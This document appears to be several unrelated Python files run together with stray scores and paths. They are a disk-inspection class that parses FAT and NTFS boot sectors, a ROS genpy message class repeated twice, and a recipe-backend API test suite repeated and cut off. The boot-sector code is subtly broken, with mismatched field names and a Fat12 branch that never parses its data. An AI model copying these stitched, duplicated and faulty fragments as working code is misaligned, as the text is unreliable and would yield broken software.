ULInt16("reservedSectors"),
ULInt8("number_copies_fat"),
ULInt16("maximum_root_entry _directories"),
ULInt16("number_of_sectors_smaller_32mb"),
ULInt8("media_descriptor"),
ULInt16("sectors_per_fat"),
ULInt16("sectorsPerTrack"),
ULInt16("number_of_head"),
ULInt32("number_hidden_sectors"),
ULInt32("sectors_number_partition"),
ULInt16("logical_drive_number"),
ULInt8("extended_signature"),
ULInt32("serial_number_partition"),
Bytes("volume_name_partition", 11),
ULInt64("fat_name"),
Bytes("executable_code", 448),
Bytes("signature", 2)
)
self.fat32BootSector = Struct("FAT32 boot sector",
Bytes("jump", 3),
ULInt64("OEM_name"),
ULInt16("bytesPerSector"),
ULInt8("sectors_per_cluster"),
Bytes("reservedSectors", 2),
ULInt8("number_copies_fat"),
ULInt16("maximum_root_entry _directories"),
ULInt16("number_of_sectors_smaller_32mb"),
ULInt8("media_descriptor"),
ULInt16("secors_per_fat_olderfatsystem"),
ULInt16("sectorsPerTrack"),
ULInt16("number_of_head"),
ULInt32("number_hidden_sectors"),
ULInt32("sectors_number_partition"),
ULInt32("sectors_number_fat"),
ULInt16("flags"),
ULInt16("fat32Drive_version"),
ULInt32("cluster_number_start_of_rootDirectory"),
ULInt16("sector_number_fs_information"),
ULInt16("sector_number_backupBoot"),
Bytes("reserved", 12),
ULInt8("logical_drive_number"),
Bytes("unused", 1),
ULInt8("extended_signature"),
ULInt32("serial_number_partition"),
Bytes("volume_name_partition", 11),
ULInt64("fat_name"),
Bytes("executable_code", 420),
Bytes("signature", 2)
)
self.bootSectorNtfs = Struct("NTFS boot sector",
Bytes("jump", 3),
Bytes("oem_id", 8),
ULInt16("bytesPerSector"),
ULInt8("sectors_per_cluster"),
Bytes("reservedSectors", 2),
Bytes("always 0", 3),
ULInt16("not used by NTFS"),
ULInt8("Media descriptor"),
Bytes("always0", 2),
ULInt16("sectorsPerTrack"),
ULInt16("numberOfHeads"),
ULInt32("hiddenSectors"),
Bytes("not_used_by_ntfs", 8),
ULInt64("totalSectors"),
ULInt64("mftLogicalClusterNumber"),
ULInt64("mftmirrLogicalClusterNumber"),
ULInt32("clusterPerFileRecordSegment"),
ULInt8("clustersPerIndexBuffer"),
Bytes("not_used_ntfs", 3),
ULInt64("volumeSerialNumber"),
ULInt32("checksum")
)
def partition_information(self, current_machine):
list_partitions = []
for physicalDisk in current_machine.Win32_DiskDrive():
for partitions in physicalDisk.associators("Win32_DiskDriveToDiskPartition"):
for logicalDisk in partitions.associators("Win32_LogicalDiskToPartition"):
partition = Partitions(self.path, self.logger)
partition.disk = physicalDisk.Caption
partition.partName = logicalDisk.Caption
partition.type = logicalDisk.FileSystem
partition.blockSize = logicalDisk.BlockSize
partition.size = logicalDisk.Size
localDrive = partition.partName + "\\"
ntfsdrive = '\\\\.\\' + localDrive.replace('\\', '')
partition = self.boot_sector_info(ntfsdrive, partition.type, partition)
list_partitions.append(partition)
return list_partitions
def boot_sector_info(self, part, type, partition):
bootSector = self.save_boot_sector(part)
self.extract_hexa(bootSector)
try:
cap1 = self.hexaBootSector.decode("hex")
if type == "NTFS":
self.bootSectorStruct = self.bootSectorNtfs.parse(cap1)
partition.sectorPerCluster = self.bootSectorStruct.sectors_per_cluster
partition.bytesPerSector = self.bootSectorStruct.bytesPerSector
partition.clusterPerFileRecordSegment = self.bootSectorStruct.clusterPerFileRecordSegment
partition.clustersPerIndexBuffer = self.bootSectorStruct.clustersPerIndexBuffer
partition.hiddenSectors = self.bootSectorStruct.hiddenSectors
partition.mftLogicalClusterNumber = self.bootSectorStruct.mftLogicalClusterNumber
partition.mftmirrLogicalClusterNumber = self.bootSectorStruct.mftmirrLogicalClusterNumber
partition.numberOfHeads = self.bootSectorStruct.numberOfHeads
partition.reservedSectors = self.bootSectorStruct.reservedSectors
partition.sectorsPerTrack = self.bootSectorStruct.sectorsPerTrack
partition.totalSectors = self.bootSectorStruct.totalSectors
partition.volumeSerialNumber = self.bootSectorStruct.volumeSerialNumber
elif type == "Fat32":
self.bootSectorStruct = self.fat32BootSector.parse(cap1)
partition.sectorPerCluster = self.bootSectorStruct.sectors_per_cluster
partition.bytesPerSector = self.bootSectorStruct.bytesPerSector
partition.numberOfHeads = self.bootSectorStruct.number_of_head
partition.sectorsPerTrack = self.bootSectorStruct.sectorsPerTrack
partition.maximumRootEntryDirectories = self.bootSectorStruct.maximum_root_entry_directories
partition.numberOfSectorsSmaller32mb = self.bootSectorStruct.number_of_sectors_smaller_32mb
partition.sectorsNumberFat = self.bootSectorStruct.sectors_number_fat
partition.fat32DriveVersion = self.bootSectorStruct.fat32_drive_version
partition.sectorNumberFsInformation = self.bootSectorStruct.sector_number_fs_information
partition.sectorsNumberPartition = self.bootSectorStruct.sectors_number_partition
partition.sectorNumberBackupBoot = self.bootSectorStruct.sector_number_backup_boot
partition.serialNumberPartition = self.bootSectorStruct.serial_number_partition
partition.fatName = self.bootSectorStruct.fat_name
elif type == "Fat16":
self.bootSectorStruct = self.fat16BootSector.parse(cap1)
partition.sectorPerCluster = self.bootSectorStruct.sectors_per_cluster
partition.bytesPerSector = self.bootSectorStruct.bytesPerSector
partition.numberOfHeads = self.bootSectorStruct.number_of_head
partition.sectorsPerTrack = self.bootSectorStruct.sectorsPerTrack
partition.maximumRootEntryDirectories = self.bootSectorStruct.maximum_root_entry_directories
partition.numberOfSectorsSmaller32mb = self.bootSectorStruct.number_of_sectors_smaller_32mb
partition.sectorsNumberFat = self.bootSectorStruct.sectors_per_fat
partition.sectorNumberPartition = self.bootSectorStruct.sector_number_partition
partition.serialNumberPartition = self.bootSectorStruct.serial_number_partition
partition.fatName = self.bootSectorStruct.fat_name
elif type == "Fat12":
partition.sectorPerCluster = self.bootSectorStruct.sectors_per_cluster
partition.bytesPerSector = self.bootSectorStruct.bytesPerSector
partition.numberOfHeads = self.bootSectorStruct.number_of_head
partition.sectorsPerTrack = self.bootSectorStruct.sectorsPerTrack
partition.possibleRootEntryNumber = self.bootSectorStruct.possible_root_entry_number
partition.numberOfSectorsSmaller32mb = self.bootSectorStruct.number_of_sectors_smaller_32mb
partition.fatName = self.bootSectorStruct.fs_type
return partition
except Exception as inst:
self.logger.error("Error : ", inst)
def save_boot_sector(self, image):
try:
file_image = open(image, "rb")
file_boot = open(self.path + os.path.sep + "boot sector", "w")
file_boot.write(hexdump.hexdump(file_image.read(512), "return"))
file_image.close()
file_boot.close()
except Exception as inst:
self.logger.error("Extracting mbr failed")
return file_boot.name
def extract_hexa(self, boot_sector):
try:
h_file = open(boot_sector, "rb")
hex_str = ""
for line in h_file.readlines():
hex_str += line[10:58]
for i in hex_str.split(" "):
self.hexaBootSector += i
h_file.close()
except Exception as inst:
self.logger.error("Error Extract Hexadecimal of bootSector")
def __str__(self):
output = ""
if self.type == "NTFS":
output += "\nDisk :" + self.disk + "\nPartition name :" + self.partName + "\nType :" + self.type
output += "\nBlock size :" + str(self.blockSize) + "\nSize :" + str(self.size) + "\nTotal sectors : " + str(
self.totalSectors)
output += "\nBytes per sector : " + str(self.bytesPerSector) + "\nSectors per cluster : " + str(
self.sectorPerCluster)
output += "\nSectors per track : " + str(
self.sectorsPerTrack) # + "\nReserved sectors : " + str(self.reservedSectors)
output += "\nHidden sectors : " + str(self.hiddenSectors) + "\nNumber of heads : " + str(self.numberOfHeads)
output += "\nLogical cluster number of MFT : " + str(
self.mftLogicalClusterNumber) + "\nLogical cluster number of MFTMIRR : " + str(
self.mftmirrLogicalClusterNumber)
output += "\nClusters per file record segment : " + str(
self.clusterPerFileRecordSegment) + "\nVolume serial number : " + str(self.volumeSerialNumber) + "\n"
elif self.type == "Fat32":
output += "\nDisk :" + self.disk + "\nPartition name :" + self.partName + "\nType :" + self.type
output += "\nBlock size :" + str(self.blockSize) + "\nSize :" + str(
self.size) + "\nBytes per sector : " + str(self.bytesPerSector)
output += "\nSectors per cluster : " + str(self.sectorPerCluster) + "\nNumber of heads : " + str(
self.numberOfHeads)
output += "\nSectors per track : " + str(self.sectorsPerTrack) + "\nMaximum root entry directories :" + str(
self.maximumRootEntryDirectories)
output += "\nNumber of sectors in partition smaller than 32 mb : " + str(self.numberOfSectorsSmaller32mb)
output += "\nNumber of sectors per FAT : " + str(
self.sectorsNumberFat) + "\nVersion of FAT32 drive : " + str(self.fat32DriveVersion)
output += "\nSector number of the FileSystem information sector : " + str(self.sectorNumberFsInformation)
output += "\nSector number of the backupboot sector : " + str(
self.sectorNumberBackupBoot) + "\nSerial number of partition : " + str(
self.serialNumberPartition) + "\n"
elif self.type == "Fat16":
output += "\nDisk :" + self.disk + "\nPartition name :" + self.partName + "\nType :" + self.type
output += "\nBlock size :" + str(self.blockSize) + "\nSize :" + str(
self.size) + "\nBytes per sector : " + str(self.bytesPerSector)
output += "\nSectors per cluster : " + str(self.sectorPerCluster) + "\nNumber of heads : " + str(
self.numberOfHeads)
output += "\nSectors per track : " + str(self.sectorsPerTrack) + "\nMaximum root entry directories :" + str(
self.maximumRootEntryDirectories)
output += "\nNumber of sectors in partition smaller than 32 mb : " + str(self.numberOfSectorsSmaller32mb)
output += "\nNumber of sectors per FAT : " + str(
self.sectorsNumberFat) + "\nNumber of sectors in partition : " + str(self.sectorNumberPartition)
output += "\nSerial number of partition : " + str(self.serialNumberPartition) + "\nFat name : " + str(
self.fatName) + "\n"
elif self.type == "Fat12":
output += "\nDisk :" + self.disk + "\nPartition name :" + self.partName + "\nType :" + self.type
output += "\nBlock size :" + str(self.blockSize) + "\nSize :" + str(
self.size) + "\nBytes per sector : " + str(self.bytesPerSector)
output += "\nSectors per cluster : " + str(self.sectorPerCluster) + "\nNumber of heads : " + str(
self.numberOfHeads)
output += "\nSectors per track : " + str(self.sectorsPerTrack) + "\nPossible root entry number :" + str(
self.possibleRootEntryNumber)
output += "\nNumber of sectors in partition smaller than 32 mb : " + str(
self.numberOfSectorsSmaller32mb) + "\nFat name : " + str(self.fatName) + "\n"
return output | 0.538255 | 0.070176 |
"""autogenerated by genpy from sbg_driver/SbgStatusGeneral.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class SbgStatusGeneral(genpy.Message):
_md5sum = "693fdf7e799b5fc52833d1649c048053"
_type = "sbg_driver/SbgStatusGeneral"
_has_header = False # flag to mark the presence of a Header object
_full_text = """# SBG Ellipse Messages
# SbgStatus submessage
# General main power
# True when main power supply is OK.
bool main_power
# General imu power
# True when IMU power supply is OK.
bool imu_power
# General gps power
# Set to True when GPS power supply is OK.
bool gps_power
# General Settings
# True if settings were correctly loaded
bool settings
# General Temperature
# True when temperature is within specified limits.
bool temperature"""
__slots__ = ['main_power','imu_power','gps_power','settings','temperature']
_slot_types = ['bool','bool','bool','bool','bool']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
main_power,imu_power,gps_power,settings,temperature
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(SbgStatusGeneral, self).__init__(*args, **kwds)
# message fields cannot be None, assign default values for those that are
if self.main_power is None:
self.main_power = False
if self.imu_power is None:
self.imu_power = False
if self.gps_power is None:
self.gps_power = False
if self.settings is None:
self.settings = False
if self.temperature is None:
self.temperature = False
else:
self.main_power = False
self.imu_power = False
self.gps_power = False
self.settings = False
self.temperature = False
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_5B().pack(_x.main_power, _x.imu_power, _x.gps_power, _x.settings, _x.temperature))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
_x = self
start = end
end += 5
(_x.main_power, _x.imu_power, _x.gps_power, _x.settings, _x.temperature,) = _get_struct_5B().unpack(str[start:end])
self.main_power = bool(self.main_power)
self.imu_power = bool(self.imu_power)
self.gps_power = bool(self.gps_power)
self.settings = bool(self.settings)
self.temperature = bool(self.temperature)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_5B().pack(_x.main_power, _x.imu_power, _x.gps_power, _x.settings, _x.temperature))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
_x = self
start = end
end += 5
(_x.main_power, _x.imu_power, _x.gps_power, _x.settings, _x.temperature,) = _get_struct_5B().unpack(str[start:end])
self.main_power = bool(self.main_power)
self.imu_power = bool(self.imu_power)
self.gps_power = bool(self.gps_power)
self.settings = bool(self.settings)
self.temperature = bool(self.temperature)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_5B = None
def _get_struct_5B():
global _struct_5B
if _struct_5B is None:
_struct_5B = struct.Struct("<5B")
return _struct_5B | bagpy-sbg/sbg_genpy/_SbgStatusGeneral.py | """autogenerated by genpy from sbg_driver/SbgStatusGeneral.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class SbgStatusGeneral(genpy.Message):
_md5sum = "693fdf7e799b5fc52833d1649c048053"
_type = "sbg_driver/SbgStatusGeneral"
_has_header = False # flag to mark the presence of a Header object
_full_text = """# SBG Ellipse Messages
# SbgStatus submessage
# General main power
# True when main power supply is OK.
bool main_power
# General imu power
# True when IMU power supply is OK.
bool imu_power
# General gps power
# Set to True when GPS power supply is OK.
bool gps_power
# General Settings
# True if settings were correctly loaded
bool settings
# General Temperature
# True when temperature is within specified limits.
bool temperature"""
__slots__ = ['main_power','imu_power','gps_power','settings','temperature']
_slot_types = ['bool','bool','bool','bool','bool']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
main_power,imu_power,gps_power,settings,temperature
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(SbgStatusGeneral, self).__init__(*args, **kwds)
# message fields cannot be None, assign default values for those that are
if self.main_power is None:
self.main_power = False
if self.imu_power is None:
self.imu_power = False
if self.gps_power is None:
self.gps_power = False
if self.settings is None:
self.settings = False
if self.temperature is None:
self.temperature = False
else:
self.main_power = False
self.imu_power = False
self.gps_power = False
self.settings = False
self.temperature = False
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_5B().pack(_x.main_power, _x.imu_power, _x.gps_power, _x.settings, _x.temperature))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
_x = self
start = end
end += 5
(_x.main_power, _x.imu_power, _x.gps_power, _x.settings, _x.temperature,) = _get_struct_5B().unpack(str[start:end])
self.main_power = bool(self.main_power)
self.imu_power = bool(self.imu_power)
self.gps_power = bool(self.gps_power)
self.settings = bool(self.settings)
self.temperature = bool(self.temperature)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_5B().pack(_x.main_power, _x.imu_power, _x.gps_power, _x.settings, _x.temperature))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
_x = self
start = end
end += 5
(_x.main_power, _x.imu_power, _x.gps_power, _x.settings, _x.temperature,) = _get_struct_5B().unpack(str[start:end])
self.main_power = bool(self.main_power)
self.imu_power = bool(self.imu_power)
self.gps_power = bool(self.gps_power)
self.settings = bool(self.settings)
self.temperature = bool(self.temperature)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_5B = None
def _get_struct_5B():
global _struct_5B
if _struct_5B is None:
_struct_5B = struct.Struct("<5B")
return _struct_5B | 0.513181 | 0.198316 |
import unittest
import requests
use_production = False
URL = 'https://sharecipe-backend.herokuapp.com' if use_production else 'http://127.0.0.1:5000'
class Account:
def __init__(self, username, password, user_id, access_token, refresh_token):
self.username = username
self.password = password
self.user_id = user_id
self.access_token = access_token
self.refresh_token = refresh_token
def delete(self):
header = {'Authorization': f'Bearer {self.refresh_token}'}
payload = {'user_id': self.user_id, 'password': self.password}
response = requests.delete(f'{URL}/account/delete', headers=header, json=payload)
@classmethod
def add(cls, username, password, bio=None):
payload = {'username': username, 'password': password, 'bio': bio}
response = requests.post(f'{URL}/account/register', json=payload)
return cls(username=username, password=password, **response.json())
class TestAPI(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Create user accounts
cls.user1 = Account.add('testing123', '123456', 'A human!')
cls.user2 = Account.add('testing456', '123456')
cls.user3 = Account.add('admin123', '123456')
@classmethod
def tearDownClass(cls):
# Delete the test accounts
cls.user1.delete()
cls.user2.delete()
cls.user3.delete()
def test_all(self):
user1 = self.user1
user2 = self.user2
user3 = self.user3
# Hello world
response = requests.get(f'{URL}/hello')
data = response.json()
self.assertDictEqual(data, {'hello': 'world'})
# User login
payload = {'username': 'testing123', 'password': '<PASSWORD>'}
response = requests.post(f'{URL}/account/login', json=payload)
data = response.json()
self.assertEqual(user1.user_id, data.get('user_id'))
# # Search users
# header = {'Authorization': f'Bearer {user1.access_token}'}
# response = requests.get(f'{URL}/users', headers=header)
# data = response.json()
# self.assertListEqual(data, [
# {'user_id': user1.user_id, 'username': 'testing123', 'bio': 'A human!'},
# {'user_id': user2.user_id, 'username': 'testing456', 'bio': None},
# {'user_id': user3.user_id, 'username': 'admin123', 'bio': None}
# ])
# # Search users with query
# header = {'Authorization': f'Bearer {user1.access_token}'}
# response = requests.get(f'{URL}/users?username=test', headers=header)
# data = response.json()
# self.assertIsInstance(data, list)
# self.assertListEqual(data, [
# {'user_id': user1.user_id, 'username': 'testing123', 'bio': 'A human!'},
# {'user_id': user2.user_id, 'username': 'testing456', 'bio': None}
# ])
# Get user data
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user2.user_id}', headers=header)
data = response.json()
self.assertIsInstance(data, dict)
self.matchDict(data, user_id=user2.user_id, username="testing456", bio=None)
# Update user data
header = {'Authorization': f'Bearer {user1.access_token}'}
payload = {'username': 'totallyNotAdmin', 'bio': 'Code. Create. Coordinate.'}
response = requests.patch(f'{URL}/users/{user1.user_id}', headers=header, json=payload)
data = response.json()
self.matchDict(data, user_id=user1.user_id, username="totallyNotAdmin", bio="Code. Create. Coordinate.")
# Change password
header = {'Authorization': f'Bearer {user2.refresh_token}'}
payload = {'old_password': '<PASSWORD>', 'new_password': '<PASSWORD>'}
response = requests.post(f'{URL}/account/changepassword', headers=header, json=payload)
self.assertEqual(response.status_code, 204)
user2.password = '<PASSWORD>'
# Try login
payload = {'username': 'testing456', 'password': '<PASSWORD>'}
response = requests.post(f'{URL}/account/login', json=payload)
self.assertEqual(response.status_code, 200)
# Follow another user
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.post(f'{URL}/users/{user1.user_id}/follows/{user2.user_id}', headers=header)
# Follow a second user
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.post(f'{URL}/users/{user1.user_id}/follows/{user3.user_id}', headers=header)
# Get user follows
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/follows', headers=header)
follows_data = response.json()
self.assertEqual(len(follows_data), 2)
# Get user 1 followers
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/followers', headers=header)
follows_data = response.json()
self.assertEqual(len(follows_data), 0)
# Get user 2 followers
header = {'Authorization': f'Bearer {user2.access_token}'}
response = requests.get(f'{URL}/users/{user2.user_id}/followers', headers=header)
follows_data = response.json()
self.assertEqual(len(follows_data), 1)
# Get follow state
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/follows/{user3.user_id}', headers=header)
# Create new recipe
header = {'Authorization': f'Bearer {user3.access_token}'}
payload = {
'name': 'Edible food',
'description': 'Very tasting food',
'portion': 3,
'difficulty': 5,
'is_public': True,
'steps': [
{'step_number': 1, 'description': 'Add water.'},
{'step_number': 2, 'description': 'Add egg.'}
],
'ingredients': [
{'name': 'Egg', 'quantity': 10.0, 'unit': 'grams'},
{'name': 'Water', 'quantity': 5.0, 'unit': 'kg'}
],
'tags': [
{'name': 'edible'},
{'name': 'tasty'},
{'name': 'modern'}
]
}
response = requests.put(f'{URL}/recipes', headers=header, json=payload)
recipe_data = response.json()
self.matchDict(
recipe_data,
user_id=user3.user_id,
name="Edible food",
description='Very tasting food',
portion=3,
difficulty=5,
is_public=True
)
# Add a new review
header = {'Authorization': f'Bearer {user1.access_token}'}
payload = {
'rating': 4,
'comment': 'this is the best recipe!'
}
response = requests.put(f'{URL}/recipes/{recipe_data["recipe_id"]}/reviews', headers=header, json=payload)
self.assertEqual(response.status_code, 201)
# Get reviews
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}/reviews', headers=header)
review_data = response.json()
self.assertEqual(response.status_code, 200)
print(review_data)
# Get tag suggestions
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/recipes/tagsuggestions', headers=header)
data = response.json()
# Get all recipe
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user3.user_id}/recipes', headers=header)
data = response.json()
# Get recipe data
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header)
data = response.json()
self.assertDictEqual(data, recipe_data)
# Update recipe data
header = {'Authorization': f'Bearer {user3.access_token}'}
payload = {'name': 'Poison'}
response = requests.patch(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header, json=payload)
data = response.json()
self.assertEqual(data.get('name'), 'Poison')
# Add a recipe step
header = {'Authorization': f'Bearer {user3.access_token}'}
payload = {'step_number': 3, 'description': 'Boil over stove.'}
response = requests.put(f'{URL}/recipes/{recipe_data["recipe_id"]}/steps', headers=header, json=payload)
data = response.json()
self.matchDict(data, recipe_id=recipe_data["recipe_id"], **payload)
# Get a recipe steps
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}/steps', headers=header, json=payload)
data = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(data), 3)
# Add recipe images
header = {'Authorization': f'Bearer {user3.access_token}'}
test_images = []
with open('tests/test1.png', 'rb') as image_file:
test_images.append(('images', image_file.read()))
with open('tests/test2.png', 'rb') as image_file:
test_images.append(('images', image_file.read()))
with open('tests/test3.png', 'rb') as image_file:
test_images.append(('images', image_file.read()))
response = requests.put(f'{URL}/recipes/{recipe_data["recipe_id"]}/images', headers=header, files=test_images)
# Get recipe images
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.post(f'{URL}/recipes/{recipe_data["recipe_id"]}/images', headers=header)
self.assertEqual(response.status_code, 200)
with open('tests/recipe_images.zip', "wb") as file:
file.write(response.content)
# Get recipe data with icons stuff
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header)
data = response.json()
# User like recipe
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.post(f'{URL}/recipes/{recipe_data["recipe_id"]}/likes/{user1.user_id}', headers=header)
self.assertEqual(response.status_code, 201)
# Another user like recipe
header = {'Authorization': f'Bearer {user2.access_token}'}
response = requests.post(f'{URL}/recipes/{recipe_data["recipe_id"]}/likes/{user2.user_id}', headers=header)
self.assertEqual(response.status_code, 201)
# Get user likes
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/recipes/likes', headers=header)
like_data = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(like_data), 1)
# Get recipe likes
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}/likes', headers=header)
like_data = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(like_data), 2)
# User unlike recipe
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.delete(f'{URL}/recipes/{recipe_data["recipe_id"]}/likes/{user1.user_id}', headers=header)
self.assertEqual(response.status_code, 204)
# User doesn't have likes
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/recipes/likes', headers=header)
like_data = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(like_data), 0)
# Get user stats
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.get(f'{URL}/users/{user3.user_id}/stats', headers=header)
print(response.json())
self.assertEqual(response.status_code, 200)
# Get the amazing discover page
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/discover', headers=header)
discover_data = response.json()
print(discover_data)
# Delete recipe
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.delete(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header)
self.assertEqual(response.status_code, 204)
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header)
self.assertEqual(response.status_code, 404)
# Upload profile image
header = {'Authorization': f'Bearer {user2.access_token}'}
with open('tests/test0.png', 'rb') as image_file:
test_image = {'image': image_file.read()}
response = requests.put(f'{URL}/users/{user2.user_id}/profileimage', headers=header, files=test_image)
self.assertEqual(response.status_code, 200)
# Download profile image
header = {'Authorization': f'Bearer {user2.access_token}'}
response = requests.get(f'{URL}/users/{user2.user_id}/profileimage', headers=header)
self.assertEqual(response.status_code, 200)
with open('tests/downloaded_test.png', "wb") as file:
file.write(response.content)
# Delete profile image
header = {'Authorization': f'Bearer {user2.access_token}'}
response = requests.delete(f'{URL}/users/{user2.user_id}/profileimage', headers=header)
self.assertEqual(response.status_code, 200)
def matchDict(self, actual, **expected):
for key, value in expected.items():
self.assertEqual(actual.get(key), value)
if __name__ == '__main__':
unittest.main() | tests/test.py | import unittest
import requests
use_production = False
URL = 'https://sharecipe-backend.herokuapp.com' if use_production else 'http://127.0.0.1:5000'
class Account:
def __init__(self, username, password, user_id, access_token, refresh_token):
self.username = username
self.password = password
self.user_id = user_id
self.access_token = access_token
self.refresh_token = refresh_token
def delete(self):
header = {'Authorization': f'Bearer {self.refresh_token}'}
payload = {'user_id': self.user_id, 'password': self.password}
response = requests.delete(f'{URL}/account/delete', headers=header, json=payload)
@classmethod
def add(cls, username, password, bio=None):
payload = {'username': username, 'password': password, 'bio': bio}
response = requests.post(f'{URL}/account/register', json=payload)
return cls(username=username, password=password, **response.json())
class TestAPI(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Create user accounts
cls.user1 = Account.add('testing123', '123456', 'A human!')
cls.user2 = Account.add('testing456', '123456')
cls.user3 = Account.add('admin123', '123456')
@classmethod
def tearDownClass(cls):
# Delete the test accounts
cls.user1.delete()
cls.user2.delete()
cls.user3.delete()
def test_all(self):
user1 = self.user1
user2 = self.user2
user3 = self.user3
# Hello world
response = requests.get(f'{URL}/hello')
data = response.json()
self.assertDictEqual(data, {'hello': 'world'})
# User login
payload = {'username': 'testing123', 'password': '<PASSWORD>'}
response = requests.post(f'{URL}/account/login', json=payload)
data = response.json()
self.assertEqual(user1.user_id, data.get('user_id'))
# # Search users
# header = {'Authorization': f'Bearer {user1.access_token}'}
# response = requests.get(f'{URL}/users', headers=header)
# data = response.json()
# self.assertListEqual(data, [
# {'user_id': user1.user_id, 'username': 'testing123', 'bio': 'A human!'},
# {'user_id': user2.user_id, 'username': 'testing456', 'bio': None},
# {'user_id': user3.user_id, 'username': 'admin123', 'bio': None}
# ])
# # Search users with query
# header = {'Authorization': f'Bearer {user1.access_token}'}
# response = requests.get(f'{URL}/users?username=test', headers=header)
# data = response.json()
# self.assertIsInstance(data, list)
# self.assertListEqual(data, [
